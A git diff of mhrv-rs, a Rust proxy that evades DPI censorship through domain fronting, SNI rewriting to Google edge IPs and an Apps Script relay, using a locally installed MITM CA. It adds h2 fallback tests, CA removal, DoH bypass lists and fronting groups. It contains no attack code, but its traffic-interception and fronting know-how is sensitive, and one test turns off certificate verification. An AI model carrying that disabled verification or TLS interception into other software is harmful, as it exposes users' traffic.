+            .await;
+        match result {
+            Err((e, RequestSent::No)) => {
+                assert!(
+                    e.is_retryable(),
+                    "pre-send error must be raw FronterError, not pre-wrapped NonRetryable; got {:?}",
+                    e
+                );
+            }
+            other => panic!("expected (Err, RequestSent::No); got {:?}", other),
+        }
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn sticky_disable_h2_for_fronting_refusal_flips_disabled_and_clears_cell() {
+        // Verify the helper that runs from each call site's 421 arm:
+        // sets h2_disabled, clears the cell, rebalances counters
+        // (h2_calls -=1 since the round-trip already counted; h2_fallbacks +=1).
+        // Tests the helper directly so we don't depend on a real h2
+        // server returning 421 — call sites already exercise the
+        // status-match wiring through code review.
+        let (addr, server_handle) = spawn_h2c_server(|_req| {
+            let resp = http::Response::builder().status(200).body(()).unwrap();
+            (resp, Vec::new())
+        })
+        .await;
+        let send = h2c_client(addr).await;
+        let fronter = fronter_for_test(false);
+        // Seed the cell so we can verify it gets cleared.
+        {
+            let mut cell = fronter.h2_cell.lock().await;
+            *cell = Some(H2Cell {
+                send: send.clone(),
+                created: Instant::now(),
+                generation: 7,
+                dead: Arc::new(AtomicBool::new(false)),
+            });
+        }
+        // Pretend a round-trip just incremented h2_calls (which is
+        // what run_h2_relay_with_send does on Ok before the call site
+        // sees the 421 status).
+        fronter.h2_calls.fetch_add(1, Ordering::Relaxed);
+
+        fronter
+            .sticky_disable_h2_for_fronting_refusal(421, "test context")
+            .await;
+
+        assert!(fronter.h2_disabled.load(Ordering::Relaxed), "must sticky-disable");
+        let cell = fronter.h2_cell.lock().await;
+        assert!(cell.is_none(), "cell must be cleared");
+        assert_eq!(
+            fronter.h2_calls.load(Ordering::Relaxed),
+            0,
+            "the h2_calls increment from the failed round-trip must be reversed"
+        );
+        assert_eq!(
+            fronter.h2_fallbacks.load(Ordering::Relaxed),
+            1,
+            "must count as a fallback"
+        );
+        drop(cell);
+
+        // Subsequent ensure_h2 must short-circuit to None without
+        // attempting to open.
+        let t0 = Instant::now();
+        assert!(fronter.ensure_h2().await.is_none());
+        assert!(
+            t0.elapsed() < Duration::from_millis(100),
+            "sticky-disabled ensure_h2 must return immediately"
+        );
+
+        // Calling the helper a second time must not log again or
+        // double-count fallbacks beyond +1 per call.
+        fronter
+            .sticky_disable_h2_for_fronting_refusal(421, "test context")
+            .await;
+        // h2_calls would underflow without the saturating guard; assert
+        // it stays at 0.
+        assert_eq!(fronter.h2_calls.load(Ordering::Relaxed), 0);
+        // h2_fallbacks goes up unconditionally (this is "another
+        // attempt that ended up on h1") — that's fine.
+        assert_eq!(fronter.h2_fallbacks.load(Ordering::Relaxed), 2);
+
+        server_handle.abort();
+    }
+
+    #[test]
+    fn is_h2_fronting_refusal_status_only_matches_421() {
+        // Guard against the helper accidentally matching ambiguous
+        // edge statuses (403 could be a real Apps Script geoblock,
+        // 4xx generally is not a "this is h2's fault" signal).
+        assert!(is_h2_fronting_refusal_status(421));
+        for s in [200, 301, 400, 403, 404, 429, 500, 502, 503] {
+            assert!(
+                !is_h2_fronting_refusal_status(s),
+                "status {} must NOT trigger sticky h2 disable",
+                s
+            );
+        }
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn h2_handshake_post_tls_returns_alpn_refused_when_peer_picks_h1() {
+        // Verify the OpenH2Error::AlpnRefused path: if the TLS layer
+        // negotiated http/1.1 (not h2), the post-TLS helper must
+        // return the typed sentinel that ensure_h2 uses to sticky-
+        // disable. We construct a fake TlsStream by short-circuiting
+        // through a real local TLS server that only advertises h1.
+        //
+        // This needs a real TLS handshake (rustls + a self-signed
+        // cert), so we set up the smallest possible test server with
+        // ALPN forced to ["http/1.1"].
+        let cert = rcgen::generate_simple_self_signed(vec!["127.0.0.1".to_string()]).unwrap();
+        let cert_der = rustls::pki_types::CertificateDer::from(cert.cert.der().to_vec());
+        let key_der = rustls::pki_types::PrivateKeyDer::Pkcs8(
+            rustls::pki_types::PrivatePkcs8KeyDer::from(cert.key_pair.serialize_der()),
+        );
+
+        let mut server_cfg = rustls::ServerConfig::builder()
+            .with_no_client_auth()
+            .with_single_cert(vec![cert_der], key_der)
+            .unwrap();
+        server_cfg.alpn_protocols = vec![b"http/1.1".to_vec()];
+        let acceptor = tokio_rustls::TlsAcceptor::from(Arc::new(server_cfg));
+
+        let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
+        let addr = listener.local_addr().unwrap();
+        let server = tokio::spawn(async move {
+            let (sock, _) = listener.accept().await.unwrap();
+            // Drive the handshake; the test only needs the negotiation
+            // to complete with ALPN=h1. After that we can drop.
+            let _tls = acceptor.accept(sock).await.unwrap();
+            tokio::time::sleep(Duration::from_millis(50)).await;
+        });
+
+        // Client side: open TLS with ALPN advertising h2 + h1.1; the
+        // server picks h1 → alpn_protocol() returns "http/1.1" not "h2".
+        let mut client_cfg = rustls::ClientConfig::builder()
+            .dangerous()
+            .with_custom_certificate_verifier(Arc::new(NoVerify))
+            .with_no_client_auth();
+        client_cfg.alpn_protocols = vec![b"h2".to_vec(), b"http/1.1".to_vec()];
+        let connector = tokio_rustls::TlsConnector::from(Arc::new(client_cfg));
+
+        let tcp = TcpStream::connect(addr).await.unwrap();
+        let name = rustls::pki_types::ServerName::try_from("127.0.0.1").unwrap();
+        let tls = connector.connect(name, tcp).await.unwrap();
+
+        let result = DomainFronter::h2_handshake_post_tls(tls).await;
+        match result {
+            Err(OpenH2Error::AlpnRefused) => {} // expected
+            Err(other) => panic!("expected AlpnRefused, got {:?}", other),
+            Ok((_send, _dead)) => panic!("expected AlpnRefused, got Ok"),
+        }
+        server.await.unwrap();
+    }
 }
diff --git a/src/lan_utils.rs b/src/lan_utils.rs
new file mode 100644
index 00000000..bbf329f8
--- /dev/null
+++ b/src/lan_utils.rs
@@ -0,0 +1,100 @@
+//! Helpers for the "Share with other devices on my Wi-Fi / network" toggle in
+//! the desktop UI and the Android share-LAN config.
+//!
+//! `detect_lan_ip()` returns the IPv4 address that the OS would use as the
+//! source for outbound traffic (i.e. the LAN-reachable address on the
+//! interface that has the default route). The trick is to open a UDP socket,
+//! `connect()` it to a public address (no packets are actually sent during
+//! the syscall), then read the socket's bound `local_addr()` — that's the
+//! IP a peer on the LAN would use to reach this machine.
+//!
+//! Returns `None` if the host has no usable IPv4 (no network at all, or
+//! IPv6-only). Callers fall back to telling the user to figure it out
+//! themselves in that case.
+//!
+//! This is the well-known UDP-`connect()` trick used by many "what's my
+//! LAN IP" helpers across the ecosystem — no
+//! getifaddrs / `if_nameindex` boilerplate, no platform-specific code,
+//! works on every target the rest of mhrv-rs builds on.
+
+use std::net::{IpAddr, UdpSocket};
+
+/// Try to figure out the LAN-reachable IPv4 of the current host. See module
+/// docs for the trick. Returns `None` on any failure (no IPv4 stack, no
+/// route, etc.) — callers should treat that as "ask the user to find it
+/// themselves" rather than as an error.
+pub fn detect_lan_ip() -> Option<IpAddr> {
+    // Bind to all interfaces on a kernel-picked port. We never read or
+    // write — the socket is just a vehicle for asking the routing table
+    // which interface would carry traffic to a public IP.
+    let sock = UdpSocket::bind(("0.0.0.0", 0)).ok()?;
+    // Public IP outside any RFC-1918 range. UDP "connect" doesn't actually
+    // send anything; it just records the peer for later sendto/recv calls
+    // and tells the kernel to commit a source-address selection.
+    sock.connect(("1.1.1.1", 80)).ok()?;
+    let local = sock.local_addr().ok()?.ip();
+    // The socket's local_addr is `0.0.0.0` only when the OS hasn't
+    // committed a source address yet (rare — connect() forces commit on
+    // every modern kernel). Treat that case as "no LAN IP available."
+    match local {
+        IpAddr::V4(v4) if v4.is_unspecified() => None,
+        ip => Some(ip),
+    }
+}
+
+/// Returns `true` if the bind host string represents "all interfaces"
+/// (`0.0.0.0`, `[::]`, or `::`, ignoring surrounding whitespace). An empty
+/// or whitespace-only value is NOT treated as a wildcard and returns `false`.
+///
+/// Used by the UI to decide whether the "share on LAN" checkbox should
+/// appear checked.
+pub fn is_share_on_lan(listen_host: &str) -> bool {
+    let trimmed = listen_host.trim();
+    matches!(trimmed, "0.0.0.0" | "[::]" | "::")
+}
+
+/// Returns `true` if the bind host string is loopback-only
+/// (`127.0.0.1`, `localhost`, `::1`, `[::1]`).
+pub fn is_loopback_only(listen_host: &str) -> bool {
+    let trimmed = listen_host.trim().to_ascii_lowercase();
+    matches!(trimmed.as_str(), "127.0.0.1" | "localhost" | "::1" | "[::1]")
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn share_on_lan_recognizes_wildcards() {
+        assert!(is_share_on_lan("0.0.0.0"));
+        assert!(is_share_on_lan(" 0.0.0.0 "));
+        assert!(is_share_on_lan("[::]"));
+        assert!(is_share_on_lan("::"));
+        assert!(!is_share_on_lan("127.0.0.1"));
+        assert!(!is_share_on_lan("192.168.1.42"));
+        assert!(!is_share_on_lan(""));
+    }
+
+    #[test]
+    fn loopback_only_recognizes_local_names() {
+        assert!(is_loopback_only("127.0.0.1"));
+        assert!(is_loopback_only("localhost"));
+        assert!(is_loopback_only("LocalHost"));
+        assert!(is_loopback_only("::1"));
+        assert!(is_loopback_only("[::1]"));
+        assert!(!is_loopback_only("0.0.0.0"));
+        assert!(!is_loopback_only("192.168.1.42"));
+    }
+
+    #[test]
+    fn detect_lan_ip_returns_non_unspecified_when_online() {
+        // This test makes a UDP `connect()` to 1.1.1.1 to ask the OS what
+        // IP it would use. On a CI box with no network the connect can
+        // fail and we'd get None; on a typical dev machine we get a real
+        // address. Either result is allowed — we just verify the unwrapped
+        // value is never `0.0.0.0` (the contract).
+        if let Some(ip) = detect_lan_ip() {
+            assert!(!ip.is_unspecified(), "got unspecified address: {}", ip);
+        }
+    }
+}
diff --git a/src/lib.rs b/src/lib.rs
index 1c62a5ba..6b53a32b 100644
--- a/src/lib.rs
+++ b/src/lib.rs
@@ -5,6 +5,7 @@ pub mod cert_installer;
 pub mod config;
 pub mod data_dir;
 pub mod domain_fronter;
+pub mod lan_utils;
 pub mod mitm;
 pub mod proxy_server;
 pub mod rlimit;
diff --git a/src/main.rs b/src/main.rs
index 92bf7f46..202c7ec5 100644
--- a/src/main.rs
+++ b/src/main.rs
@@ -7,7 +7,7 @@ use std::sync::Arc;
 use tokio::sync::Mutex;
 use tracing_subscriber::EnvFilter;
 
-use mhrv_rs::cert_installer::{install_ca, is_ca_trusted};
+use mhrv_rs::cert_installer::{install_ca, is_ca_trusted, reconcile_sudo_environment, remove_ca};
 use mhrv_rs::config::Config;
 use mhrv_rs::mitm::{MitmCertManager, CA_CERT_FILE};
 use mhrv_rs::proxy_server::ProxyServer;
@@ -18,6 +18,7 @@ const VERSION: &str = env!("CARGO_PKG_VERSION");
 struct Args {
     config_path: Option<PathBuf>,
     install_cert: bool,
+    remove_cert: bool,
     no_cert_check: bool,
     command: Command,
 }
@@ -44,6 +45,11 @@ USAGE:
 OPTIONS:
     -c, --config PATH    Path to config.json (default: ./config.json)
     --install-cert       Install the MITM CA certificate and exit
+    --remove-cert        Remove the MITM CA from the OS trust store (verified by
+                         name), then delete the on-disk ca/ directory and exit.
+                         NSS cleanup (Firefox/Chrome) is best-effort. A fresh CA
+                         is generated on next run. config.json and your Apps
+                         Script deployment are untouched.
     --no-cert-check      Skip the auto-install-if-untrusted check on startup
     -h, --help           Show this message
     -V, --version        Show version
@@ -58,6 +64,7 @@ ENV:
 fn parse_args() -> Result<Args, String> {
     let mut config_path: Option<PathBuf> = None;
     let mut install_cert = false;
+    let mut remove_cert = false;
     let mut no_cert_check = false;
     let mut command = Command::Serve;
 
@@ -102,13 +109,18 @@ fn parse_args() -> Result<Args, String> {
                 config_path = Some(PathBuf::from(v));
             }
             "--install-cert" => install_cert = true,
+            "--remove-cert" => remove_cert = true,
             "--no-cert-check" => no_cert_check = true,
             other => return Err(format!("unknown argument: {}", other)),
         }
     }
+    if install_cert && remove_cert {
+        return Err("--install-cert and --remove-cert cannot be combined".into());
+    }
     Ok(Args {
         config_path,
         install_cert,
+        remove_cert,
         no_cert_check,
         command,
     })
@@ -127,6 +139,14 @@ async fn main() -> ExitCode {
     // Install default rustls crypto provider (ring).
     let _ = rustls::crypto::ring::default_provider().install_default();
 
+    // Must run before anything else reads HOME / USER / data_dir — if
+    // the user ran `sudo ./mhrv-rs ...`, this re-points HOME at the
+    // invoking user's home so user-scoped cert paths (Firefox profiles,
+    // macOS login keychain, the mhrv-rs data dir) are not silently
+    // operated against root's home. No-op on Windows and for non-sudo
+    // invocations.
+    reconcile_sudo_environment();
+
     let args = match parse_args() {
         Ok(a) => a,
         Err(e) => {
@@ -136,6 +156,29 @@ async fn main() -> ExitCode {
         }
     };
 
+    // --remove-cert runs without a valid config — the CA files may be
+    // the only thing present in the data dir. `config.json` and the
+    // Apps Script deployment are intentionally untouched: the user does
+    // not have to redeploy Code.gs after regenerating the CA.
+    if args.remove_cert {
+        init_logging("info");
+        let base = mhrv_rs::data_dir::data_dir();
+        match remove_ca(&base) {
+            Ok(outcome) => {
+                tracing::info!("{}", outcome.summary());
+                tracing::info!(
+                    "A fresh CA will be generated next time the proxy starts — \
+                     run --install-cert then to re-trust it."
+                );
+                return ExitCode::SUCCESS;
+            }
+            Err(e) => {
+                eprintln!("remove failed: {}", e);
+                return ExitCode::FAILURE;
+            }
+        }
+    }
+
     // --install-cert can run without a valid config — only needs the CA file.
     if args.install_cert {
         init_logging("info");
@@ -245,11 +288,12 @@ async fn main() -> ExitCode {
                 tracing::info!("Script ID: {}", sids[0]);
             }
         }
-        mhrv_rs::config::Mode::GoogleOnly => {
+        mhrv_rs::config::Mode::Direct => {
             tracing::warn!(
-                "google_only bootstrap: direct SNI-rewrite tunnel to {} only. \
-                 Open https://script.google.com in your browser (proxy set to \
-                 {}:{}), deploy Code.gs, then switch to apps_script mode.",
+                "direct mode: SNI-rewrite tunnel only (Google edge {} + any \
+                 configured fronting_groups). Open https://script.google.com \
+                 in your browser (proxy set to {}:{}), deploy Code.gs, then \
+                 switch to apps_script mode for full DPI bypass.",
                 config.google_ip,
                 config.listen_host,
                 config.listen_port
diff --git a/src/proxy_server.rs b/src/proxy_server.rs
index 41063057..209bbc58 100644
--- a/src/proxy_server.rs
+++ b/src/proxy_server.rs
@@ -3,6 +3,7 @@ use std::net::SocketAddr;
 use std::sync::Arc;
 use std::time::Duration;
 
+use bytes::Bytes;
 use tokio::io::{AsyncReadExt, AsyncWriteExt};
 use tokio::net::{TcpListener, TcpStream, UdpSocket};
 use tokio::sync::{mpsc, Mutex};
@@ -15,7 +16,7 @@ use tokio_rustls::rustls::server::Acceptor;
 use tokio_rustls::rustls::{ClientConfig, DigitallySignedStruct, SignatureScheme};
 use tokio_rustls::{LazyConfigAcceptor, TlsAcceptor, TlsConnector};
 
-use crate::config::{Config, Mode};
+use crate::config::{Config, FrontingGroup, Mode};
 use crate::domain_fronter::DomainFronter;
 use crate::mitm::MitmCertManager;
 use crate::tunnel_client::{decode_udp_packets, TunnelMux};
@@ -47,6 +48,18 @@ const SNI_REWRITE_SUFFIXES: &[&str] = &[
     "youtu.be",
     "youtube-nocookie.com",
     "ytimg.com",
+    // NOTE on `googlevideo.com`: v1.7.4 (#275) added this here on the
+    // theory that video chunks should bypass the Apps Script relay.
+    // **Reverted in v1.7.6** — multiple users (#275 amirabbas117, #281
+    // mrerf) reported total YouTube breakage after v1.7.4. Root cause
+    // is that googlevideo.com is served by Google's separate "EVA"
+    // edge IPs, not the regular GFE IPs that the user's `google_ip`
+    // typically points at. SNI-rewriting `googlevideo.com:443` to a
+    // GFE IP got TLS handshake / wrong-cert errors for those users.
+    // Pre-v1.7.4 behaviour (chunks via the Apps Script relay path —
+    // slow but reliable on every GFE IP) is restored. If we ever want
+    // direct googlevideo.com routing, it needs a separate config knob
+    // that lets users specify their EVA edge IP independently.
     // Google Video Transport CDN — YouTube video chunks, Chrome
     // auto-updates, Google Play Store downloads. The single biggest
     // gap vs the upstream Python port: without these in the list
@@ -72,27 +85,100 @@ const SNI_REWRITE_SUFFIXES: &[&str] = &[
     "blogger.com",
 ];
 
-/// YouTube-family suffixes. Extracted so `youtube_via_relay` config can
-/// pull them out of the SNI-rewrite dispatch at runtime.
-const YOUTUBE_SNI_SUFFIXES: &[&str] = &[
+/// YouTube hosts that should be routed through the Apps Script relay
+/// when `youtube_via_relay` is enabled — the API + HTML surfaces where
+/// Restricted Mode is actually enforced (via the SNI=www.google.com
+/// edge looking at the request). Issue #102 / #275.
+///
+/// Deliberately narrower than the YouTube section of
+/// `SNI_REWRITE_SUFFIXES`:
+///   - `youtube.com` / `youtu.be` / `youtube-nocookie.com`: HTML pages
+///     and player frames. These trigger Restricted Mode if served via
+///     the SNI rewrite, so when the flag is on we relay them.
+///   - `youtubei.googleapis.com`: the YouTube data API the player
+///     queries for video metadata + manifest. Restricted Mode also
+///     gates video availability here. Without this entry, the JSON
+///     RPC layer would still hit the SNI-rewrite tunnel via the
+///     broader `googleapis.com` suffix — the user-visible symptom of
+///     that miss is "youtube_via_relay flips on but Restricted Mode
+///     stays sticky on some videos."
+///
+/// **NOT** in this list (intentional, was a regression in #275):
+///   - `ytimg.com`: thumbnails. No Restricted Mode logic on a static
+///     image CDN; routing through Apps Script makes thumbnails slow
+///     for zero gain.
+///   - `googlevideo.com`: video chunk CDN. Routing through Apps Script
+///     means every chunk eats Apps Script quota *and* risks the 6-min
+///     execution cap aborting long videos mid-playback.
+///   - `ggpht.com`: channel/profile images, same reasoning as ytimg.
+const YOUTUBE_RELAY_HOSTS: &[&str] = &[
     "youtube.com",
     "youtu.be",
     "youtube-nocookie.com",
-    "ytimg.com",
+    "youtubei.googleapis.com",
+];
+
+/// Built-in list of DNS-over-HTTPS endpoints. CONNECTs to these (when
+/// `tunnel_doh` is set to `false`, i.e. the DoH bypass is enabled)
+/// skip the Apps Script tunnel and exit via plain TCP. Mix of the
+/// browser-pinned variants Chrome/Brave/Edge/Firefox/Safari use and the
+/// well-known public DoH providers users wire up by hand. Suffix
+/// matching means we don't need to enumerate every tenant subdomain
+/// (e.g. `*.cloudflare-dns.com` covers Workers-hosted DoH too).
+///
+/// Entries are matched case-insensitively. Both exact-match (`dns.google`)
+/// and dot-anchored suffix-match (a host whose suffix is `.cloudflare-dns.com`
+/// or which equals `cloudflare-dns.com`) are accepted — the suffix behaviour
+/// of `passthrough_hosts`'s `.foo` rule, but with no leading dot required.
+const DEFAULT_DOH_HOSTS: &[&str] = &[
+    // The base SLD covers every tenant subdomain via suffix matching;
+    // the browser-pinned variants below are listed for grep/discovery
+    // (so a user searching "chrome.cloudflare-dns.com" finds this list)
+    // and are technically redundant under cloudflare-dns.com.
+    "cloudflare-dns.com",
+    "chrome.cloudflare-dns.com",
+    "mozilla.cloudflare-dns.com",
+    "1dot1dot1dot1.cloudflare-dns.com",
+    "dns.google",
+    "dns.google.com",
+    "dns.quad9.net",
+    "dns11.quad9.net",
+    "dns.adguard-dns.com",
+    "unfiltered.adguard-dns.com",
+    "family.adguard-dns.com",
+    "dns.nextdns.io",
+    "doh.opendns.com",
+    "doh.cleanbrowsing.org",
+    "doh.dns.sb",
+    "dns0.eu",
+    "dns.alidns.com",
+    "doh.pub",
+    "dns.mullvad.net",
 ];
 
 fn matches_sni_rewrite(host: &str, youtube_via_relay: bool) -> bool {
     let h = host.to_ascii_lowercase();
     let h = h.trim_end_matches('.');
+
+    // YouTube relay carve-out runs FIRST so it wins over the broad
+    // `googleapis.com` suffix that would otherwise pull
+    // `youtubei.googleapis.com` into the SNI-rewrite path. The earlier
+    // implementation iterated SNI_REWRITE_SUFFIXES with a filter, which
+    // works for sibling entries (e.g. `youtube.com` in both lists) but
+    // not for nested ones (`youtubei.googleapis.com` matches the broad
+    // `googleapis.com` even when its specific entry is filtered out).
+    // The short-circuit here is unconditional — we don't need to check
+    // SNI rewrite once we've decided this host goes to the relay.
+    if youtube_via_relay {
+        for s in YOUTUBE_RELAY_HOSTS {
+            if h == *s || h.ends_with(&format!(".{}", s)) {
+                return false;
+            }
+        }
+    }
+
     SNI_REWRITE_SUFFIXES
         .iter()
-        .filter(|s| {
-            // If the user opted into youtube_via_relay, skip YouTube
-            // suffixes so they fall through to the Apps Script relay
-            // path. See config.rs `youtube_via_relay` docs for the
-            // trade-off. Issue #102.
-            !(youtube_via_relay && YOUTUBE_SNI_SUFFIXES.contains(s))
-        })
         .any(|s| h == *s || h.ends_with(&format!(".{}", s)))
 }
 
@@ -125,12 +211,15 @@ pub struct ProxyServer {
     host: String,
     port: u16,
     socks5_port: u16,
-    /// `None` in `google_only` (bootstrap) mode: no Apps Script relay is
-    /// wired up, only the SNI-rewrite tunnel path is live.
+    /// `None` in `direct` mode: no Apps Script relay is wired up,
+    /// only the SNI-rewrite tunnel path (Google edge + any configured
+    /// `fronting_groups`) is live.
     fronter: Option<Arc<DomainFronter>>,
     mitm: Arc<Mutex<MitmCertManager>>,
     rewrite_ctx: Arc<RewriteCtx>,
     tunnel_mux: Option<Arc<TunnelMux>>,
+    coalesce_step_ms: u64,
+    coalesce_max_ms: u64,
 }
 
 pub struct RewriteCtx {
@@ -148,6 +237,146 @@ pub struct RewriteCtx {
     /// and pass through as plain TCP (optionally via upstream_socks5).
     /// See config.rs `passthrough_hosts` for matching rules. Issues #39, #127.
     pub passthrough_hosts: Vec<String>,
+    /// If true, drop SOCKS5 UDP datagrams destined for port 443 so
+    /// callers fall back to TCP/HTTPS. See config.rs `block_quic` for
+    /// the trade-off. Issue #213.
+    pub block_quic: bool,
+    pub block_stun: bool,
+    /// If true, route DoH CONNECTs around the Apps Script tunnel via
+    /// plain TCP. Set to `!Config::tunnel_doh`, so it defaults to false
+    /// while `tunnel_doh` defaults to true (flipped in v1.9.0, issue
+    /// #468). See `DEFAULT_DOH_HOSTS` and `matches_doh_host` for
+    /// matching, and config.rs `tunnel_doh` for the trade-off.
+    pub bypass_doh: bool,
+    /// When true, immediately reject connections to known DoH hosts.
+    /// Takes priority over bypass_doh.
+    pub block_doh: bool,
+    /// User-supplied DoH hostnames added to the built-in default list.
+    /// Same matching semantics as `passthrough_hosts`.
+    pub bypass_doh_hosts: Vec<String>,
+    /// Multi-edge fronting groups, resolved at startup. Each group's
+    /// `ServerName` is parsed once so the per-connection dial path
+    /// is allocation-free. Wrapped in `Arc` so a per-CONNECT match
+    /// can hand the dispatcher a refcount-clone instead of cloning
+    /// the whole struct (which holds a `Vec<String>` of normalized
+    /// domains used only for matching). Empty = feature off (only
+    /// the built-in Google edge SNI-rewrite is active).
+    pub fronting_groups: Vec<Arc<FrontingGroupResolved>>,
+}
+
+/// True if `h` matches one DoH list `entry`. `h` is compared as-is, so
+/// callers pass it lowercased; `entry` is normalized here (trimmed,
+/// trailing dots and one leading dot dropped, lowercased) and never
+/// matches when empty. Match is exact OR dot-anchored suffix.
+fn host_matches_doh_entry(h: &str, entry: &str) -> bool {
+    let e = entry.trim().trim_end_matches('.').to_ascii_lowercase();
+    let e = e.strip_prefix('.').unwrap_or(&e);
+    if e.is_empty() {
+        return false;
+    }
+    h == e || h.ends_with(&format!(".{}", e))
+}
+
+/// True if `host` matches a known DoH endpoint — either the built-in
+/// `DEFAULT_DOH_HOSTS` list or a user-supplied entry in `extra`. Match
+/// is case-insensitive and needs no leading dot on entries (unlike
+/// `passthrough_hosts`): every subdomain of a DoH service such as
+/// `cloudflare-dns.com` is itself a DoH endpoint. Empty host → false.
+pub fn matches_doh_host(host: &str, extra: &[String]) -> bool {
+    let h = host.to_ascii_lowercase();
+    let h = h.trim_end_matches('.');
+    if h.is_empty() {
+        return false;
+    }
+    if DEFAULT_DOH_HOSTS
+        .iter()
+        .any(|s| host_matches_doh_entry(h, s))
+    {
+        return true;
+    }
+    extra.iter().any(|s| host_matches_doh_entry(h, s))
+}
+
+/// A `FrontingGroup` after one-time validation: `server_name` is the
+/// group's `sni` parsed into a `ServerName` once, so dialing doesn't
+/// repay the parse, and `domains_normalized` holds the domain entries
+/// pre-lower-cased + dot-trimmed so matching is plain byte comparison.
+#[derive(Debug, Clone)]
+pub struct FrontingGroupResolved {
+    pub name: String,
+    pub ip: String,
+    pub sni: String,
+    pub server_name: ServerName<'static>,
+    domains_normalized: Vec<String>,
+}
+
+impl FrontingGroupResolved {
+    /// Parses `sni` (Err if invalid); domains are trimmed, lowercased, edge dots stripped.
+    fn from_config(g: &FrontingGroup) -> Result<Self, String> {
+        let server_name = ServerName::try_from(g.sni.clone())
+            .map_err(|e| format!("invalid sni '{}': {}", g.sni, e))?;
+        let domains = g.domains.iter();
+        let domains_normalized = domains
+            .map(|d| d.trim().trim_matches('.').to_ascii_lowercase())
+            .filter(|d| !d.is_empty())
+            .collect();
+        Ok(Self {
+            name: g.name.clone(),
+            ip: g.ip.clone(),
+            sni: g.sni.clone(),
+            server_name,
+            domains_normalized,
+        })
+    }
+}
+
+/// First fronting group whose domain list matches `host`, if any.
+/// `host` is lowercased and trailing-dot trimmed here; an empty host
+/// or an empty `groups` slice yields `None`. Matching is
+/// unconditionally suffix-anchored: an entry `vercel.com` matches both
+/// `vercel.com` and `*.vercel.com`, because every legitimate subdomain
+/// of a fronted domain is itself fronted by the same edge — requiring
+/// users to spell out every subdomain would be a footgun. First match
+/// wins, so users can put more-specific groups earlier when entries
+/// would otherwise overlap.
+pub fn match_fronting_group<'a>(
+    host: &str,
+    groups: &'a [Arc<FrontingGroupResolved>],
+) -> Option<&'a Arc<FrontingGroupResolved>> {
+    if groups.is_empty() {
+        return None;
+    }
+    let h = host.to_ascii_lowercase();
+    let h = h.trim_end_matches('.');
+    if h.is_empty() {
+        return None;
+    }
+    for g in groups {
+        for d in &g.domains_normalized {
+            if is_dot_anchored_match(h, d) {
+                return Some(g);
+            }
+        }
+    }
+    None
+}
+
+/// True if `host` equals `entry` exactly OR ends with `.` followed by
+/// `entry` (i.e. `entry == "vercel.com"` matches `host ==
+/// "app.vercel.com"` but not `host == "xvercel.com"`). Both inputs
+/// must already be lowercase + trailing-dot trimmed; the function
+/// does no allocation, unlike the obvious `format!(".{}", entry)`
+/// implementation that allocates per call.
+#[inline]
+fn is_dot_anchored_match(host: &str, entry: &str) -> bool {
+    if host == entry {
+        return true;
+    }
+    let hb = host.as_bytes();
+    let eb = entry.as_bytes();
+    hb.len() > eb.len()
+        && hb.ends_with(eb)
+        && hb[hb.len() - eb.len() - 1] == b'.'
 }
 
 /// True if `host` matches any entry in the user's passthrough list.
@@ -181,16 +410,16 @@ impl ProxyServer {
             .mode_kind()
             .map_err(|e| std::io::Error::new(std::io::ErrorKind::InvalidInput, format!("{e}")))?;
 
-        // `google_only` mode skips the Apps Script relay entirely, so we must
+        // `direct` mode skips the Apps Script relay entirely, so we must
         // not try to construct the DomainFronter — it errors on a missing
-        // `script_id`, which is exactly the state a bootstrapping user is in.
+        // `script_id`, which is exactly the state a direct-mode user is in.
         let fronter = match mode {
             Mode::AppsScript | Mode::Full => {
                 let f = DomainFronter::new(config)
                     .map_err(|e| std::io::Error::new(std::io::ErrorKind::Other, format!("{e}")))?;
                 Some(Arc::new(f))
             }
-            Mode::GoogleOnly => None,
+            Mode::Direct => None,
         };
 
         let tls_config = if config.verify_ssl {
@@ -207,6 +436,68 @@ impl ProxyServer {
         };
         let tls_connector = TlsConnector::from(Arc::new(tls_config));
 
+        // Surface a config combo that is otherwise silently inert: extras
+        // listed under `bypass_doh_hosts` only take effect when the bypass
+        // itself is on. A user who set `tunnel_doh: true` *and* populated
+        // the extras list almost certainly didn't mean to disable the
+        // feature their custom hosts feed into.
+        if config.tunnel_doh && !config.bypass_doh_hosts.is_empty() {
+            tracing::warn!(
+                "config: bypass_doh_hosts has {} entries but tunnel_doh=true — \
+                 the bypass is off, so the extras have no effect. Set \
+                 tunnel_doh=false (or omit it) to use them.",
+                config.bypass_doh_hosts.len()
+            );
+        }
+
+        // Same-shape warning for fronting_groups in full mode. The dispatch
+        // short-circuits to the tunnel mux before the fronting_groups check
+        // (full mode preserves end-to-end TLS, fronting_groups requires
+        // MITM), so groups configured here will never fire. Surface this
+        // at startup rather than letting users wonder why their Vercel
+        // domains never hit the configured edge.
+        if mode == Mode::Full && !config.fronting_groups.is_empty() {
+            tracing::warn!(
+                "config: fronting_groups has {} entries but mode=full — \
+                 full mode tunnels everything end-to-end through Apps Script \
+                 (no MITM), so groups never fire. Switch to mode=apps_script \
+                 or mode=direct to use them, or remove the groups to silence \
+                 this warning.",
+                config.fronting_groups.len()
+            );
+        }
+
+        let mut fronting_groups: Vec<Arc<FrontingGroupResolved>> =
+            Vec::with_capacity(config.fronting_groups.len());
+        let mut seen_names: std::collections::HashSet<String> = Default::default();
+        for g in &config.fronting_groups {
+            let resolved = FrontingGroupResolved::from_config(g).map_err(|e| {
+                std::io::Error::new(
+                    std::io::ErrorKind::InvalidInput,
+                    format!("fronting_groups['{}']: {}", g.name, e),
+                )
+            })?;
+            // Surface duplicate group names at startup. Not a hard
+            // error — copy-pasted configs can land here legitimately
+            // — but log lines key on `name` and dedup ambiguity makes
+            // them unreadable.
+            if !seen_names.insert(resolved.name.clone()) {
+                tracing::warn!(
+                    "fronting group name '{}' is used by more than one group; \
+                     log lines that reference the name will be ambiguous",
+                    resolved.name
+                );
+            }
+            tracing::info!(
+                "fronting group '{}': sni={} ip={} domains={}",
+                resolved.name,
+                resolved.sni,
+                resolved.ip,
+                resolved.domains_normalized.len()
+            );
+            fronting_groups.push(Arc::new(resolved));
+        }
+
         let rewrite_ctx = Arc::new(RewriteCtx {
             google_ip: config.google_ip.clone(),
             front_domain: config.front_domain.clone(),
@@ -216,6 +507,12 @@ impl ProxyServer {
             mode,
             youtube_via_relay: config.youtube_via_relay,
             passthrough_hosts: config.passthrough_hosts.clone(),
+            block_quic: config.block_quic,
+            block_stun: config.block_stun,
